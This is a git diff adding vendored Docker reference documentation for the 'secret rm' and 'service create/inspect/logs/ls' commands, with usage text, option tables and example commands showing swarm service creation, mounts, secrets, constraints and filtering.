diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
new file mode 100644
index 0000000000..f504b1ba4f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
@@ -0,0 +1,48 @@
+---
+title: "secret rm"
+description: "The secret rm command description and usage"
+keywords: ["secret, rm"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# secret rm
+
+```Markdown
+Usage:	docker secret rm SECRET [SECRET...]
+
+Remove one or more secrets
+
+Aliases:
+  rm, remove
+
+Options:
+      --help   Print usage
+```
+
+Removes the specified secrets from the swarm. This command has to be run
+targeting a manager node.
+
+This example removes a secret:
+
+```bash
+$ docker secret rm secret.json
+sapth4csdo5b6wz2p5uimh5xg
+```
+
+> **Warning**: Unlike `docker rm`, this command does not ask for confirmation
+> before removing a secret.
+
+
+## Related information
+
+* [secret create](secret_create.md)
+* [secret inspect](secret_inspect.md)
+* [secret ls](secret_ls.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
new file mode 100644
index 0000000000..c9e298096b
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
@@ -0,0 +1,556 @@
+---
+title: "service create"
+description: "The service create command description and usage"
+keywords: "service, create"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service create
+
+```Markdown
+Usage:  docker service create [OPTIONS] IMAGE [COMMAND] [ARG...]
+
+Create a new service
+
+Options:
+      --constraint list                  Placement constraints (default [])
+      --container-label list             Container labels (default [])
+      --dns list                         Set custom DNS servers (default [])
+      --dns-option list                  Set DNS options (default [])
+      --dns-search list                  Set custom DNS search domains (default [])
+      --endpoint-mode string             Endpoint mode (vip or dnsrr)
+  -e, --env list                         Set environment variables (default [])
+      --env-file list                    Read in a file of environment variables (default [])
+      --group list                       Set one or more supplementary user groups for the container (default [])
+      --health-cmd string                Command to run to check health
+      --health-interval duration         Time between running the check (ns|us|ms|s|m|h)
+      --health-retries int               Consecutive failures needed to report unhealthy
+      --health-timeout duration          Maximum time to allow one check to run (ns|us|ms|s|m|h)
+      --help                             Print usage
+      --host list                        Set one or more custom host-to-IP mappings (host:ip) (default [])
+      --hostname string                  Container hostname
+  -l, --label list                       Service labels (default [])
+      --limit-cpu decimal                Limit CPUs (default 0.000)
+      --limit-memory bytes               Limit Memory (default 0 B)
+      --log-driver string                Logging driver for service
+      --log-opt list                     Logging driver options (default [])
+      --mode string                      Service mode (replicated or global) (default "replicated")
+      --mount mount                      Attach a filesystem mount to the service
+      --name string                      Service name
+      --network list                     Network attachments (default [])
+      --no-healthcheck                   Disable any container-specified HEALTHCHECK
+  -p, --publish port                     Publish a port as a node port
+      --replicas uint                    Number of tasks
+      --reserve-cpu decimal              Reserve CPUs (default 0.000)
+      --reserve-memory bytes             Reserve Memory (default 0 B)
+      --restart-condition string         Restart when condition is met (none, on-failure, or any)
+      --restart-delay duration           Delay between restart attempts (ns|us|ms|s|m|h)
+      --restart-max-attempts uint        Maximum number of restarts before giving up
+      --restart-window duration          Window used to evaluate the restart policy (ns|us|ms|s|m|h)
+      --secret secret                    Specify secrets to expose to the service
+      --stop-grace-period duration       Time to wait before force killing a container (ns|us|ms|s|m|h)
+  -t, --tty                              Allocate a pseudo-TTY
+      --update-delay duration            Delay between updates (ns|us|ms|s|m|h) (default 0s)
+      --update-failure-action string     Action on update failure (pause|continue) (default "pause")
+      --update-max-failure-ratio float   Failure rate to tolerate during an update
+      --update-monitor duration          Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)
+      --update-parallelism uint          Maximum number of tasks updated simultaneously (0 to update all at once) (default 1)
+  -u, --user string                      Username or UID (format: <name|uid>[:<group|gid>])
+      --with-registry-auth               Send registry authentication details to swarm agents
+  -w, --workdir string                   Working directory inside the container
+```
+
+Creates a service as described by the specified parameters. You must run this
+command on a manager node.
+
+## Examples
+
+### Create a service
+
+```bash
+$ docker service create --name redis redis:3.0.6
+dmu1ept4cxcfe8k8lhtux3ro3
+
+$ docker service create --mode global --name redis2 redis:3.0.6
+a8q9dasaafudfs8q8w32udass
+
+$ docker service ls
+ID            NAME    MODE        REPLICAS  IMAGE
+dmu1ept4cxcf  redis   replicated  1/1       redis:3.0.6
+a8q9dasaafud  redis2  global      1/1       redis:3.0.6
+```
+
+### Create a service with 5 replica tasks (--replicas)
+
+Use the `--replicas` flag to set the number of replica tasks for a replicated
+service. The following command creates a `redis` service with `5` replica tasks:
+
+```bash
+$ docker service create --name redis --replicas=5 redis:3.0.6
+4cdgfyky7ozwh3htjfw0d12qv
+```
+
+The above command sets the *desired* number of tasks for the service. Even
+though the command returns immediately, actual scaling of the service may take
+some time. The `REPLICAS` column shows both the *actual* and *desired* number
+of replica tasks for the service.
+
+In the following example the desired state is  `5` replicas, but the current
+number of `RUNNING` tasks is `3`:
+
+```bash
+$ docker service ls
+ID            NAME   MODE        REPLICAS  IMAGE
+4cdgfyky7ozw  redis  replicated  3/5       redis:3.0.7
+```
+
+Once all the tasks are created and `RUNNING`, the actual number of tasks is
+equal to the desired number:
+
+```bash
+$ docker service ls
+ID            NAME   MODE        REPLICAS  IMAGE
+4cdgfyky7ozw  redis  replicated  5/5       redis:3.0.7
+```
+
+### Create a service with secrets
+Use the `--secret` flag to give a container access to a
+[secret](secret_create.md).
+
+Create a service specifying a secret:
+
+```bash
+$ docker service create --name redis --secret secret.json redis:3.0.6
+4cdgfyky7ozwh3htjfw0d12qv
+```
+
+Create a service specifying the secret, target, user/group ID and mode:
+
+```bash
+$ docker service create --name redis \
+    --secret source=ssh-key,target=ssh \
+    --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \
+    redis:3.0.6
+4cdgfyky7ozwh3htjfw0d12qv
+```
+
+Secrets are located in `/run/secrets` in the container.  If no target is
+specified, the name of the secret will be used as the in memory file in the
+container.  If a target is specified, that will be the filename.  In the
+example above, two files will be created: `/run/secrets/ssh` and
+`/run/secrets/app` for each of the secret targets specified.
+
+### Create a service with a rolling update policy
+
+```bash
+$ docker service create \
+  --replicas 10 \
+  --name redis \
+  --update-delay 10s \
+  --update-parallelism 2 \
+  redis:3.0.6
+```
+
+When you run a [service update](service_update.md), the scheduler updates a
+maximum of 2 tasks at a time, with `10s` between updates. For more information,
+refer to the [rolling updates
+tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/).
+
+### Set environment variables (-e, --env)
+
+This sets environmental variables for all tasks in a service. For example:
+
+```bash
+$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6
+```
+
+### Create a docker service with specific hostname (--hostname)
+
+This option sets the docker service containers hostname to a specific string. For example:
+```bash
+$ docker service create --name redis --hostname myredis redis:3.0.6
+```
+### Set metadata on a service (-l, --label)
+
+A label is a `key=value` pair that applies metadata to a service. To label a
+service with two labels:
+
+```bash
+$ docker service create \
+  --name redis_2 \
+  --label com.example.foo="bar"
+  --label bar=baz \
+  redis:3.0.6
+```
+
+For more information about labels, refer to [apply custom
+metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
+
+### Add bind-mounts or volumes
+
+Docker supports two different kinds of mounts, which allow containers to read to
+or write from files or directories on other containers or the host operating
+system. These types are _data volumes_ (often referred to simply as volumes) and
+_bind-mounts_.
+
+Additionally, Docker also supports tmpfs mounts.
+
+A **bind-mount** makes a file or directory on the host available to the
+container it is mounted within. A bind-mount may be either read-only or
+read-write. For example, a container might share its host's DNS information by
+means of a bind-mount of the host's `/etc/resolv.conf` or a container might
+write logs to its host's `/var/log/myContainerLogs` directory. If you use
+bind-mounts and your host and containers have different notions of permissions,
+access controls, or other such details, you will run into portability issues.
+
+A **named volume** is a mechanism for decoupling persistent data needed by your
+container from the image used to create the container and from the host machine.
+Named volumes are created and managed by Docker, and a named volume persists
+even when no container is currently using it. Data in named volumes can be
+shared between a container and the host machine, as well as between multiple
+containers. Docker uses a _volume driver_ to create, manage, and mount volumes.
+You can back up or restore volumes using Docker commands.
+
+A **tmpfs** mounts a tmpfs inside a container for volatile data.
+
+Consider a situation where your image starts a lightweight web server. You could
+use that image as a base image, copy in your website's HTML files, and package
+that into another image. Each time your website changed, you'd need to update
+the new image and redeploy all of the containers serving your website. A better
+solution is to store the website in a named volume which is attached to each of
+your web server containers when they start. To update the website, you just
+update the named volume.
+
+For more information about named volumes, see
+[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/).
+
+The following table describes options which apply to both bind-mounts and named
+volumes in a service:
+
+| Option                                   | Required                  | Description
+|:-----------------------------------------|:--------------------------|:-----------------------------------------------------------------------------------------
+| **type**                                 |                           | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.<ul><li>`volume`: mounts a [managed volume](volume_create.md) into the container.</li><li>`bind`: bind-mounts a directory or file from the host into the container.</li><li>`tmpfs`: mount a tmpfs in the container</li></ul>
+| **src** or **source**                    | for `type=bind`&nbsp;only | <ul><li>`type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).</li><li>`type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`).  An error is produced if the file or directory does not exist.</li><li>`type=tmpfs`: `src` is not supported.</li></ul>
+| **dst** or **destination** or **target** | yes                       | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount.
+| **readonly** or **ro**                   |                           | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.<br /><br /><ul><li>`true` or `1` or no value: Mounts the bind or volume read-only.</li><li>`false` or `0`: Mounts the bind or volume read-write.</li></ul>
+
+#### Bind Propagation
+
+Bind propagation refers to whether or not mounts created within a given
+bind-mount or named volume can be propagated to replicas of that mount. Consider
+a mount point `/mnt`, which is also mounted on `/tmp`. The propation settings
+control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each
+propagation setting has a recursive counterpoint. In the case of recursion,
+consider that `/tmp/a` is also mounted as `/foo`. The propagation settings
+control whether `/mnt/a` and/or `/tmp/a` would exist.
+
+The `bind-propagation` option defaults to `rprivate` for both bind-mounts and
+volume mounts, and is only configurable for bind-mounts. In other words, named
+volumes do not support bind propagation.
+
+- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts,
+                and sub-mounts of replica mounts are also propagated to the
+                original mount.
+- **`slave`**: similar to a shared mount, but only in one direction. If the
+               original mount exposes a sub-mount, the replica mount can see it.
+               However, if the replica mount exposes a sub-mount, the original
+               mount cannot see it.
+- **`private`**: The mount is private. Sub-mounts within it are not exposed to
+                 replica mounts, and sub-mounts of replica mounts are not
+                 exposed to the original mount.
+- **`rshared`**: The same as shared, but the propagation also extends to and from
+                 mount points nested within any of the original or replica mount
+                 points.
+- **`rslave`**: The same as `slave`, but the propagation also extends to and from
+                 mount points nested within any of the original or replica mount
+                 points.
+- **`rprivate`**: The default. The same as `private`, meaning that no mount points
+                  anywhere within the original or replica mount points propagate
+                  in either direction.
+
+For more information about bind propagation, see the
+[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt).
+
+#### Options for Named Volumes
+The following options can only be used for named volumes (`type=volume`);
+
+| Option                | Description
+|:----------------------|:--------------------------------------------------------------------------------------------------------------------
+| **volume-driver**     | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist.
+| **volume-label**      | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
+| **volume-nocopy**     | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disables copying files from the container's filesystem to the volume and mount the empty volume.<br /><br />A value is optional:<ul><li>`true` or `1`: Default if you do not provide a value. Disables copying.</li><li>`false` or `0`: Enables copying.</li></ul>
+| **volume-opt**        | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation.
+
+#### Options for tmpfs
+The following options can only be used for tmpfs mounts (`type=tmpfs`);
+
+| Option                | Description
+|:----------------------|:--------------------------------------------------------------------------------------------------------------------
+| **tmpfs-size**        | Size of the tmpfs mount in bytes. Unlimited by default in Linux.
+| **tmpfs-mode**        | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux.
+
+#### Differences between "--mount" and "--volume"
+
+The `--mount` flag supports most options that are supported by the `-v`
+or `--volume` flag for `docker run`, with some important exceptions:
+
+- The `--mount` flag allows you to specify a volume driver and volume driver
+    options *per volume*, without creating the volumes in advance. In contrast,
+    `docker run` allows you to specify a single volume driver which is shared
+    by all volumes, using the `--volume-driver` flag.
+
+- The `--mount` flag allows you to specify custom metadata ("labels") for a volume,
+    before the volume is created.
+
+- When you use `--mount` with `type=bind`, the host-path must refer to an *existing*
+    path on the host. The path will not be created for you and the service will fail
+    with an error if the path does not exist.
+
+- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags,
+    which are used for `selinux` labeling.
+
+#### Create a service using a named volume
+
+The following example creates a service that uses a named volume:
+
+```bash
+$ docker service create \
+  --name my-service \
+  --replicas 3 \
+  --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \
+  nginx:alpine
+```
+
+For each replica of the service, the engine requests a volume named "my-volume"
+from the default ("local") volume driver where the task is deployed. If the
+volume does not exist, the engine creates a new volume and applies the "color"
+and "shape" labels.
+
+When the task is started, the volume is mounted on `/path/in/container/` inside
+the container.
+
+Be aware that the default ("local") volume is a locally scoped volume driver.
+This means that depending on where a task is deployed, either that task gets a
+*new* volume named "my-volume", or shares the same "my-volume" with other tasks
+of the same service. Multiple containers writing to a single shared volume can
+cause data corruption if the software running inside the container is not
+designed to handle concurrent processes writing to the same location. Also take
+into account that containers can be re-scheduled by the Swarm orchestrator and
+be deployed on a different node.
+
+#### Create a service that uses an anonymous volume
+
+The following command creates a service with three replicas with an anonymous
+volume on `/path/in/container`:
+
+```bash
+$ docker service create \
+  --name my-service \
+  --replicas 3 \
+  --mount type=volume,destination=/path/in/container \
+  nginx:alpine
+```
+
+In this example, no name (`source`) is specified for the volume, so a new volume
+is created for each task. This guarantees that each task gets its own volume,
+and volumes are not shared between tasks. Anonymous volumes are removed after
+the task using them is complete.
+
+#### Create a service that uses a bind-mounted host directory
+
+The following example bind-mounts a host directory at `/path/in/container` in
+the containers backing the service:
+
+```bash
+$ docker service create \
+  --name my-service \
+  --mount type=bind,source=/path/on/host,destination=/path/in/container \
+  nginx:alpine
+```
+
+### Set service mode (--mode)
+
+The service mode determines whether this is a _replicated_ service or a _global_
+service. A replicated service runs as many tasks as specified, while a global
+service runs on each active node in the swarm.
+
+The following command creates a global service:
+
+```bash
+$ docker service create \
+ --name redis_2 \
+ --mode global \
+ redis:3.0.6
+```
+
+### Specify service constraints (--constraint)
+
+You can limit the set of nodes where a task can be scheduled by defining
+constraint expressions. Multiple constraints find nodes that satisfy every
+expression (AND match). Constraints can match node or Docker Engine labels as
+follows:
+
+| node attribute  | matches                   | example                                         |
+|:----------------|:--------------------------|:------------------------------------------------|
+| node.id         | node ID                   | `node.id == 2ivku8v2gvtg4`                      |
+| node.hostname   | node hostname             | `node.hostname != node-2`                       |
+| node.role       | node role: manager        | `node.role == manager`                          |
+| node.labels     | user defined node labels  | `node.labels.security == high`                  |
+| engine.labels   | Docker Engine's labels    | `engine.labels.operatingsystem == ubuntu 14.04` |
+
+`engine.labels` apply to Docker Engine labels like operating system,
+drivers, etc. Swarm administrators add `node.labels` for operational purposes by
+using the [`docker node update`](node_update.md) command.
+
+For example, the following limits tasks for the redis service to nodes where the
+node type label equals queue:
+
+```bash
+$ docker service create \
+  --name redis_2 \
+  --constraint 'node.labels.type == queue' \
+  redis:3.0.6
+```
+
+### Attach a service to an existing network (--network)
+
+You can use overlay networks to connect one or more services within the swarm.
+
+First, create an overlay network on a manager node the docker network create
+command:
+
+```bash
+$ docker network create --driver overlay my-network
+
+etjpu59cykrptrgw0z0hk5snf
+```
+
+After you create an overlay network in swarm mode, all manager nodes have
+access to the network.
+
+When you create a service and pass the --network flag to attach the service to
+the overlay network:
+
+```bash
+$ docker service create \
+  --replicas 3 \
+  --network my-network \
+  --name my-web \
+  nginx
+
+716thylsndqma81j6kkkb5aus
+```
+
+The swarm extends my-network to each node running the service.
+
+Containers on the same network can access each other using
+[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery).
+
+### Publish service ports externally to the swarm (-p, --publish)
+
+You can publish service ports to make them available externally to the swarm
+using the `--publish` flag:
+
+```bash
+$ docker service create --publish <TARGET-PORT>:<SERVICE-PORT> nginx
+```
+
+For example:
+
+```bash
+$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx
+```
+
+When you publish a service port, the swarm routing mesh makes the service
+accessible at the target port on every node regardless if there is a task for
+the service running on the node. For more information refer to
+[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/).
+
+### Publish a port for TCP only or UDP only
+
+By default, when you publish a port, it is a TCP port. You can
+specifically publish a UDP port instead of or in addition to a TCP port. When
+you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to
+add the suffix `/tcp` for TCP ports. Otherwise it is optional.
+
+#### TCP only
+
+The following two commands are equivalent.
+
+```bash
+$ docker service create --name dns-cache -p 53:53 dns-cache
+
+$ docker service create --name dns-cache -p 53:53/tcp dns-cache
+```
+
+#### TCP and UDP
+
+```bash
+$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache
+```
+
+#### UDP only
+
+```bash
+$ docker service create --name dns-cache -p 53:53/udp dns-cache
+```
+
+### Create services using templates
+
+You can use templates for some flags of `service create`, using the syntax
+provided by the Go's [text/template](http://golange.org/pkg/text/template/) package.
+
+The supported flags are the following :
+
+- `--hostname`
+- `--mount`
+- `--env`
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder       | Description
+----------------- | --------------------------------------------
+`.Service.ID`     | Service ID
+`.Service.Name`   | Service name
+`.Service.Labels` | Service labels
+`.Node.ID`        | Node ID
+`.Task.ID`        | Task ID
+`.Task.Name`      | Task name
+`.Task.Slot`      | Task slot
+
+#### Template example
+
+In this example, we are going to set the template of the created containers based on the
+service's name and the node's ID where it sits.
+
+```bash
+$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top
+va8ew30grofhjoychbr6iot8c
+
+$ docker service ps va8ew30grofhjoychbr6iot8c
+ID            NAME         IMAGE                                                                                   NODE          DESIRED STATE  CURRENT STATE               ERROR  PORTS
+wo41w8hg8qan  hosttempl.1  busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912  2e7a8a9c4da2  Running        Running about a minute ago
+
+$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj
+x3ti0erg11rjpg64m75kej2mz-hosttempl
+```
+
+## Related information
+
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service rm](service_rm.md)
+* [service scale](service_scale.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
+
+<style>table tr > td:first-child { white-space: nowrap;}</style>
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
new file mode 100644
index 0000000000..8b4ab62d89
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
@@ -0,0 +1,162 @@
+---
+title: "service inspect"
+description: "The service inspect command description and usage"
+keywords: "service, inspect"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service inspect
+
+```Markdown
+Usage:  docker service inspect [OPTIONS] SERVICE [SERVICE...]
+
+Display detailed information on one or more services
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+      --pretty          Print the information in a human friendly format.
+```
+
+
+Inspects the specified service. This command has to be run targeting a manager
+node.
+
+By default, this renders all results in a JSON array. If a format is specified,
+the given template will be executed for each result.
+
+Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+## Examples
+
+### Inspecting a service  by name or ID
+
+You can inspect a service, either by its *name*, or *ID*
+
+For example, given the following service;
+
+```bash
+$ docker service ls
+ID            NAME   MODE        REPLICAS  IMAGE
+dmu1ept4cxcf  redis  replicated  3/3       redis:3.0.6
+```
+
+Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf`
+produce the same result:
+
+```bash
+$ docker service inspect redis
+[
+    {
+        "ID": "dmu1ept4cxcfe8k8lhtux3ro3",
+        "Version": {
+            "Index": 12
+        },
+        "CreatedAt": "2016-06-17T18:44:02.558012087Z",
+        "UpdatedAt": "2016-06-17T18:44:02.558012087Z",
+        "Spec": {
+            "Name": "redis",
+            "TaskTemplate": {
+                "ContainerSpec": {
+                    "Image": "redis:3.0.6"
+                },
+                "Resources": {
+                    "Limits": {},
+                    "Reservations": {}
+                },
+                "RestartPolicy": {
+                    "Condition": "any",
+                    "MaxAttempts": 0
+                },
+                "Placement": {}
+            },
+            "Mode": {
+                "Replicated": {
+                    "Replicas": 1
+                }
+            },
+            "UpdateConfig": {},
+            "EndpointSpec": {
+                "Mode": "vip"
+            }
+        },
+        "Endpoint": {
+            "Spec": {}
+        }
+    }
+]
+```
+
+```bash
+$ docker service inspect dmu1ept4cxcf
+[
+    {
+        "ID": "dmu1ept4cxcfe8k8lhtux3ro3",
+        "Version": {
+            "Index": 12
+        },
+        ...
+    }
+]
+```
+
+### Inspect a service using pretty-print
+
+You can print the inspect output in a human-readable format instead of the default
+JSON output, by using the `--pretty` option:
+
+```bash
+$ docker service inspect --pretty frontend
+ID:		c8wgl7q4ndfd52ni6qftkvnnp
+Name:		frontend
+Labels:
+ - org.example.projectname=demo-app
+Service Mode:	REPLICATED
+ Replicas:		5
+Placement:
+UpdateConfig:
+ Parallelism:	0
+ContainerSpec:
+ Image:		nginx:alpine
+Resources:
+Endpoint Mode:  vip
+Ports:
+ Name =
+ Protocol = tcp
+ TargetPort = 443
+ PublishedPort = 4443
+```
+
+You can also use `--format pretty` for the same effect.
+
+
+### Finding the number of tasks running as part of a service
+
+The `--format` option can be used to obtain specific information about a
+service. For example, the following command outputs the number of replicas
+of the "redis" service.
+
+```bash{% raw %}
+$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis
+10
+{% endraw %}```
+
+
+## Related information
+
+* [service create](service_create.md)
+* [service logs](service_logs.md)
+* [service ls](service_ls.md)
+* [service rm](service_rm.md)
+* [service scale](service_scale.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
new file mode 100644
index 0000000000..fdf6a3a245
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
@@ -0,0 +1,77 @@
+---
+title: "service logs (experimental)"
+description: "The service logs command description and usage"
+keywords: "service, logs"
+advisory: "experimental"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service logs
+
+```Markdown
+Usage:  docker service logs [OPTIONS] SERVICE
+
+Fetch the logs of a service
+
+Options:
+      --details        Show extra details provided to logs
+  -f, --follow         Follow log output
+      --help           Print usage
+      --since string   Show logs since timestamp
+      --tail string    Number of lines to show from the end of the logs (default "all")
+  -t, --timestamps     Show timestamps
+```
+
+The `docker service logs` command batch-retrieves logs present at the time of execution.
+
+> **Note**: this command is only functional for services that are started with
+> the `json-file` or `journald` logging driver.
+
+For more information about selecting and configuring logging drivers, refer to
+[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/).
+
+The `docker service logs --follow` command will continue streaming the new output from
+the service's `STDOUT` and `STDERR`.
+
+Passing a negative number or a non-integer to `--tail` is invalid and the
+value is set to `all` in that case.
+
+The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants)
+, for example `2014-09-16T06:17:46.000000000Z`, to each
+log entry. To ensure that the timestamps are aligned the
+nano-second part of the timestamp will be padded with zero when necessary.
+
+The `docker service logs --details` command will add on extra attributes, such as
+environment variables and labels, provided to `--log-opt` when creating the
+service.
+
+The `--since` option shows only the service logs generated after
+a given date. You can specify the date as an RFC 3339 date, a UNIX
+timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date
+format you may also use RFC3339Nano, `2006-01-02T15:04:05`,
+`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
+timezone on the client will be used if you do not provide either a `Z` or a
+`+-00:00` timezone offset at the end of the timestamp. When providing Unix
+timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
+that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
+seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
+fraction of a second no more than nine digits long. You can combine the
+`--since` option with either or both of the `--follow` or `--tail` options.
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service ls](service_ls.md)
+* [service rm](service_rm.md)
+* [service scale](service_scale.md)
+* [service ps](service_ps.md)
+* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
new file mode 100644
index 0000000000..ccd68af750
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
@@ -0,0 +1,114 @@
+---
+title: "service ls"
+description: "The service ls command description and usage"
+keywords: "service, ls"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# service ls
+
+```Markdown
+Usage:	docker service ls [OPTIONS]
+
+List services
+
+Aliases:
+  ls, list
+
+Options:
+  -f, --filter value   Filter output based on conditions provided
+      --help           Print usage
+  -q, --quiet          Only display IDs
+```
+
+This command when run targeting a manager, lists services are running in the
+swarm.
+
+On a manager node:
+```bash
+$ docker service ls
+ID            NAME      MODE        REPLICAS    IMAGE
+c8wgl7q4ndfd  frontend  replicated  5/5         nginx:alpine
+dmu1ept4cxcf  redis     replicated  3/3         redis:3.0.6
+iwe3278osahj  mongo     global      7/7         mongo:3.3
+```
+
+The `REPLICAS` column shows both the *actual* and *desired* number of tasks for
+the service.
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
+than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* [id](service_ls.md#id)
+* [label](service_ls.md#label)
+* [name](service_ls.md#name)
+
+#### ID
+
+The `id` filter matches all or part of a service's id.
+
+```bash
+$ docker service ls -f "id=0bcjw"
+ID            NAME   MODE        REPLICAS  IMAGE
+0bcjwfh8ychr  redis  replicated  1/1       redis:3.0.6
+```
+
+#### Label
+
+The `label` filter matches services based on the presence of a `label` alone or
+a `label` and a value.
+
+The following filter matches all services with a `project` label regardless of
+its value:
+
+```bash
+$ docker service ls --filter label=project
+ID            NAME       MODE        REPLICAS  IMAGE
+01sl1rp6nj5u  frontend2  replicated  1/1       nginx:alpine
+36xvvwwauej0  frontend   replicated  5/5       nginx:alpine
+74nzcxxjv6fq  backend    replicated  3/3       redis:3.0.6
+```
+
+The following filter matches only services with the `project` label with the
+`project-a` value.
+
+```bash
+$ docker service ls --filter label=project=project-a
+ID            NAME      MODE        REPLICAS  IMAGE
+36xvvwwauej0  frontend  replicated  5/5       nginx:alpine
+74nzcxxjv6fq  backend   replicated  3/3       redis:3.0.6
+```
+
+#### Name
+
+The `name` filter matches on all or part of a service's name.
+
+The following filter matches services with a name containing `redis`.
+
+```bash
+$ docker service ls --filter name=redis
+ID            NAME   MODE        REPLICAS  IMAGE
+0bcjwfh8ychr  redis  replicated  1/1       redis:3.0.6
+```
+
+## Related information
+
+* [service create](service_create.md)
+* [service inspect](service_inspect.md)
+* [service logs](service_logs.md)
+* [service rm](service_rm.md)
